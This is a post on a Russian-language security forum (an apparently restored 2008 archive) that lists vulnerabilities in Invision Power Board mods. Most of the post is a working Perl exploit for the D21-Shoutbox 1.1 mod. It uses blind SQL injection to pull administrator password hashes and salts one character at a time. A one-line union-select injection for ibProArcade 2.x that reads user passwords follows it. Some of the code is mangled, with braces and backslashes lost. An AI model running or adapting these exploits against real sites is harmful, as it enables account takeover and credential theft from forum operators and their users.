ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу [Обзор уязвимостей IPB]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости Модов IPB
  #14  
Старый 26.10.2008, 17:18
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию Уязвимости Модов IPB
Автор _GaLs_

Уязвимости Модов IPB

D21-Shoutbox 1.1

PHP код:
 #!/usr/bin/perl 

######################################## 
# Coded by k1b0rg (768620) # 
# shout.pl <site> <id> # 
# shout.pl http://site.ru/forum/ 1 # 
# shout.pl http://site.ru/forum/ 1,2 # 
######################################## 

use LWP::UserAgent
my $browser LWP::UserAgent->new(); 
$site=$ARGV[0]; 
my $admins_id=$ARGV[1]; 
@admin=split(',',$admins_id); 
my $res=$browser->get($site.'index.php?act=Shoutbox'); 
if($res->content=~/act=Shoutbox&shout=(d+)/is

my $idshout=$1
syswrite STDOUT"\n".'Shout box found!'
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'\''); 
if($res->content =~ /(SQL error|mySQL query error)/is

syswrite STDOUT"\n".'Mode(sql) shoutbox: [OK]'
if($res->content =~ /FROM (.*?)shoutbox/i

$prefix_bd=$1
syswrite STDOUT"\n".'prefix_bd_shoutbox: ['.$prefix_bd.']'
&shout_sql($idshout); 


else { syswrite STDOUT"\n".'NOT Vulnerebility';} 

else { syswrite STDOUT"\n".'Shout box mode NOT FOUND!';} 
sub shout_sql($) 

my $idshout=$_[0]; 
foreach my $id(@admin

syswrite STDOUT"\n".'Admin id ('.$id.') : ['
for($i=1;$i<=32;$i++) 

&position_shout(97,102,$i,$id,$idshout,'pass') if (!&position_shout(48,57,$i,$id,$idshout,'pass')) 

syswrite STDOUT':'
for($i=1;$i<=5;$i++) 

&position_shout(33,126,$i,$id,$idshout,'salt'); 

syswrite STDOUT']'


sub position_shout($$$$$$) 

my ($j,$max,$i,$mid,$idshout,$label)=@_
while($j<=$max

if(&scan_shout($site,$j,$mid,$i,$idshout,$label)) { syswrite STDOUTchr($j); return 1;} 
$j++; 


sub scan_shout($$$$$) 

my ($site,$num,$mid,$pos,$idshout,$label)=@_
my $field=($label eq 'pass')?('converge_pass_hash')'converge_pass_sal t'); 
my $res=$browser->get($site.'index.php?act=Shoutbox&shout='.$idshout.'+and(ascii(substring((select+'.$   field.'+from+'.$prefix_bd.'members_converge+where+   converge_id='.$mid.'),'.$pos.',1))='.$num.')/*'); 
return if($res->content=~/varssidss=s[(d+)];/is); 

ibProArcade 2.x

SQL Injection Exploit
Цитата:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
PS Материал востановлен
Дата публикации: 26.05.2007, 12:20
Автор _GaLs_
Последний раз редактировалось jokester; 27.10.2008 в 09:03..
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ